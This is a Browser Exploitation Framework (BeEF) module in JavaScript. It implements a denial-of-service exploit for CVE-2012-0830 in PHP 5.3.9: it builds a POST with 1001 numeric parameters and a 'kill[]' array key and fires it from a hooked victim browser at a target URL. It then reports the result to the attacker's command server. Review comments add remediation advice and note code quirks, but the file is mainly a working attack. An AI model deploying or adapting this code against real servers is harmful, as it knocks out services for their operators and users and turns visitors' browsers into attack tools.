//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {

  // Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
  // PoC written by Paul Westin
  // PoC ported to BeEF by bcoles
  // Bug discovered by Stefan Esser (@i0n1c)
  // For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
  //
  // This file is an ERB template: the <%= ... %> tokens are substituted by
  // the framework before the script is served, so it is not valid
  // JavaScript until rendered.
  //
  // NOTE(review): the request built below is recognisable on the wire as a
  // form-encoded POST carrying sequential numeric parameters 0..1000
  // followed by a single `kill[]` parameter. Per the header above the bug
  // is specific to PHP 5.3.9; a PHP release containing the CVE-2012-0830
  // fix is the remediation, and a request-parameter-count limit at the
  // proxy/WAF is a reasonable compensating control.

  /**
   * Builds the parameter set for the request.
   *
   * Numeric keys 0..1000 (1001 entries, each with value 1) are added first,
   * then one array-style key `kill[]`. The original comment said "1000
   * normal keys"; the loop bound has always been 1001, which puts the
   * count just above PHP's max_input_vars limit (1000 by default --
   * confirm against the target configuration).
   *
   * @returns {Object} plain object mapping parameter names to values
   */
  function createEvilObj () {
    var params = {};
    var n = 0;
    while (n < 1001) {
      params[n] = 1;
      n++;
    }
    params['kill[]'] = 'kill';
    return params;
  }

  /**
   * Flattens an object into a `key=value&key=value` string.
   *
   * NOTE(review): keys and values are concatenated as-is, with no
   * percent-encoding, and every enumerable property reachable through
   * for...in (inherited ones included) is emitted.
   *
   * @param {Object} obj - parameters to serialize
   * @returns {string} form-style body
   */
  function serializeObj (obj) {
    var pairs = [];
    var key;
    for (key in obj) {
      pairs[pairs.length] = key + "=" + obj[key];
    }
    return pairs.join("&");
  }

  /**
   * Sends the serialized parameters to target_url as an asynchronous
   * form-encoded POST. No response handler is attached, so the outcome of
   * the request is never observed by this module.
   *
   * @param {string} target_url - URL the POST is sent to
   */
  function php_dos (target_url) {
    var body = serializeObj(createEvilObj());
    var request = new XMLHttpRequest();
    request.open("POST", target_url, true);
    request.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    // NOTE(review): Content-Length is a forbidden request header for XHR;
    // browsers ignore this call and compute the length themselves.
    request.setRequestHeader('Content-Length', body.length);
    request.send(body);
  }

  // The "result" message is reported as soon as send() has been queued
  // (the request is asynchronous), so it only means the request was
  // issued, not that the target received it or was affected by it.
  // Only synchronous exceptions raised while building or issuing the
  // request reach the catch branch.
  try {
    php_dos("<%= @url %>");
    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
  } catch (err) {
    beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+err.toString());
  }

});